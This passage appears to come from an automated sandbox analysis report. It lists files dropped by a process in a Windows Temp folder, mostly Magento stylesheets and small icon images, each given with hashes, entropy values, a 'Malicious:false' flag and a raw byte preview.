                                                                                                                                                                                                                                                          MD5:67762894881BFB63FB6961C18CB31251
                                                                                                                                                                                                                                                          SHA1:0A1E5D5BF083BF5AB745CEF7F2F7DEEA28FA70D4
                                                                                                                                                                                                                                                          SHA-256:9652BA4942B40A66C17785230946AB83320878DA3432B64B5815BFBFF267E247
                                                                                                                                                                                                                                                          SHA-512:549A137F2E628D4BEEF1259F836FCEA8DD8E0C095F43DC9E1196CEA410CB232A7A6D8AE43501FA3DE78F6E242F2A66405E9543CF2B803DD1A9FFF2868A7DD653
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...P...P........;....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1568
                                                                                                                                                                                                                                                          Entropy (8bit):4.942541983682357
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:hwyUwTlgKWSv5JZ0rKvG45jdSYqE2JeXNDs6izDNHZzz:h7+KZxJqQAeXi6i3Vtz
                                                                                                                                                                                                                                                          MD5:6C9118F4F853D7ABC63505FD692D75F3
                                                                                                                                                                                                                                                          SHA1:76B3CE5EC7FBEC277BD5357E2BD6AD2C461D2AEB
                                                                                                                                                                                                                                                          SHA-256:077AA5312F62AC255FAB801D71E08970BC70E2DB469292BD9622B80EA15281C8
                                                                                                                                                                                                                                                          SHA-512:1B81E2879067223419D09B4C6DF8A90F1255CD707EBEF0C490701E4701B721A7D4AC65860EB04083B51EB2F4CDD02D53AE880D6CD5534FF2A53C4824BE5D9E78
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:/**. * Magento. *. * NOTICE OF LICENSE. *. * This source file is subject to the Academic Free License (AFL 3.0). * that is bundled with this package in the file LICENSE_AFL.txt.. * It is also available through the world-wide-web at this URL:. * http://opensource.org/licenses/afl-3.0.php. * If you did not receive a copy of the license and are unable to. * obtain it through the world-wide-web, please send an email. * to license@magentocommerce.com so we can send you a copy immediately.. *. * DISCLAIMER. *. * Do not edit or add to this file if you wish to upgrade Magento to newer. * versions in the future. If you wish to customize Magento for your. * needs please refer to http://www.magentocommerce.com for more information.. *. * @category design. * @package default_modern. * @copyright Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com). * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0). */.* { background:none !important;
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9410
                                                                                                                                                                                                                                                          Entropy (8bit):4.808156480467523
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:8xTTXb1y2qsr2WlPFGU6NQ78CodleKl5DJ:8Rysr2UgnXeKl59
                                                                                                                                                                                                                                                          MD5:8FE70C8D484CF5852239704F1A614273
                                                                                                                                                                                                                                                          SHA1:F13788A7DDCD3EA44A34779803CC8D27EC5C3C13
                                                                                                                                                                                                                                                          SHA-256:6D46AD7400BA5FE7CADB930AEDAF0A8FEAD8609A5E26DCD48B274E6AC146DD94
                                                                                                                                                                                                                                                          SHA-512:754CCE55105E01CD9668E2570212140022BB52FDC0FD02C60C34C8B691BC45D7B2187FCBA95FB9FC196D6F438154A22DAD4AFC044A3A1FC80024725AFA3066A6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:./*! normalize.css v1.0.1 | MIT License | git.io/normalize */../* ==========================================================================. HTML5 display definitions. ========================================================================== */../*. * Corrects `block` display not defined in IE 6/7/8/9 and Firefox 3.. */..article,.aside,.details,.figcaption,.figure,.footer,.header,.hgroup,.nav,.section,.summary {. display: block;.}../*. * Corrects `inline-block` display not defined in IE 6/7/8/9 and Firefox 3.. */..audio,.canvas,.video {. display: inline-block;. *display: inline;. *zoom: 1;.}../*. * Prevents modern browsers from displaying `audio` without controls.. * Remove excess height in iOS 5 devices.. */..audio:not([controls]) {. display: none;. height: 0;.}../*. * Addresses styling for `hidden` attribute not present in IE 7/8/9, Firefox 3,. * and Safari 4.. * Known issue: no IE 6 support.. */..[hidden] {. display: none;.}../* ===========================
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4357
                                                                                                                                                                                                                                                          Entropy (8bit):5.086666572264107
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:h7+KZxJqQACHvdNOHAQVVZoxkVSmoAVxrYFQAR8/cr0Rx//rxCP7Rit/i7ri:hiex4CvdK30WvBcAMm9jxCP1iJini
                                                                                                                                                                                                                                                          MD5:1BC699D294BA8BD26942A616C3EA89BF
                                                                                                                                                                                                                                                          SHA1:A9D12A169CB0280B92DE02AB8C6C7C8DC1C1B378
                                                                                                                                                                                                                                                          SHA-256:F54611C97CE99395B222F18FAB12115EA88182BD5FA922B8942DC5E792184D91
                                                                                                                                                                                                                                                          SHA-512:895F0F099AE6A4CDF35B076B84D353762555A74C1A0FCA45DE438E2FD8E0468484FA4480FB84F94AEC42F2FC4EA5939E2A3107B446656D1ABFEAFAE86DCAA2D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:/**. * Magento. *. * NOTICE OF LICENSE. *. * This source file is subject to the Academic Free License (AFL 3.0). * that is bundled with this package in the file LICENSE_AFL.txt.. * It is also available through the world-wide-web at this URL:. * http://opensource.org/licenses/afl-3.0.php. * If you did not receive a copy of the license and are unable to. * obtain it through the world-wide-web, please send an email. * to license@magentocommerce.com so we can send you a copy immediately.. *. * DISCLAIMER. *. * Do not edit or add to this file if you wish to upgrade Magento to newer. * versions in the future. If you wish to customize Magento for your. * needs please refer to http://www.magentocommerce.com for more information.. *. * @category design. * @package default_modern. * @copyright Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com). * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0). */../* Widgets =======================
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.0034072391179
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:3l4333333Ba333U7JDYF7336Ooi/F73afj/F72vcvtRaIDJluX5Ojk:VgWF+OZ/Fmj/Fgc6+uJOjk
                                                                                                                                                                                                                                                          MD5:67B4BC8703A96A1CAB1B0AC8E37B26F8
                                                                                                                                                                                                                                                          SHA1:363D0703311B99984E26F216A5205CD8D03E8389
                                                                                                                                                                                                                                                          SHA-256:AE2369C58A93218087EB6B5535B1D2547F1FAE00DBC7303ACE8B3B1238BC7CB2
                                                                                                                                                                                                                                                          SHA-512:0283160D49F3F7C17496B5476B2BF7689B3203E0E97CD36CA6EBE06A24D46A62F469C4F24E310220AA48D4FF7AD6D51A56621ED443AFAA50B7645B6688EBB33A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................?_..MZ.L...I...P...P...P...P...P...P...P...P...P...P...H.8.H*?..LZ.MZ................................................./9../9..KX.MZ................................................/9...9..KX.MZ................................................/9...9..KX.MZ................................................/9...9..KX.MZ......................p|..co..................../9...9..KX.MZ..................P`..MZ..MZ..P[................./9...9..KX.MZ..............MZ..Q^..........O[..MZ..lw......./9...9..KX.MZ......Vc..MZ..co..................en..MZ..S]..../9...9..KX.MZ..MZ..MZ................................MZ..MZ..>K../9..MZ.MZ..O_..........................................R`..MZ..LW.KY.JYc.................................................Zg..LY.S..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):597
                                                                                                                                                                                                                                                          Entropy (8bit):7.503484841838105
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7w7/6TVuA6q45LsaGcUiSVgYtyHUzX8hXqY+sP5yuRGe0zwcu6S:X7/6xft45LqcUjGYUUzX8hXfPP0uiksS
                                                                                                                                                                                                                                                          MD5:535102101CF2549EAAC03D4D2424C607
                                                                                                                                                                                                                                                          SHA1:70BF44C6E737D6127182AB1D38840A448ED6A162
                                                                                                                                                                                                                                                          SHA-256:2E520CE5AAAF8A0DC35E182FE8986438B8CAB107221304AB4C9EAA901E1956AE
                                                                                                                                                                                                                                                          SHA-512:FA510429D278EDFC7576EC900B88A60D1E09B656CF558F16DBB1404137F372B89D67AD9B06EF6114D7353E4501486FEFD9284B888E53D29B8364604504C377D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs.................IDAT8..Mh.Q...{3.....&.*1..Zqg.i.A%.`.\...F.(....(.....q.E.e.mA..Z.XK..6.L3..ys]....Wzv..s..........yj.&[..t....U.0....;.|..[.....%..J.HbZ..T.......T.<BPJ..0p....1~[.OFgv...dLj..:D..'..Y...?t}ziMwx.@#..jj..S.c..<...o%s..M.t*bI...........5...w.Q2i...i%./...|..*s...u.j&.............k..9..r,.....p..9qW..bRi..W....}DC....T..E<|T0......0Ijx....\V.t...._..d.[....S.p(......>.....o.m...T[.pl[h..3.#..rE..v...wM..8[......h.,..G.~'...m?...5..V...e.b.=.7.!...D4....q)...*.%B.m?...o..#..9w1......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
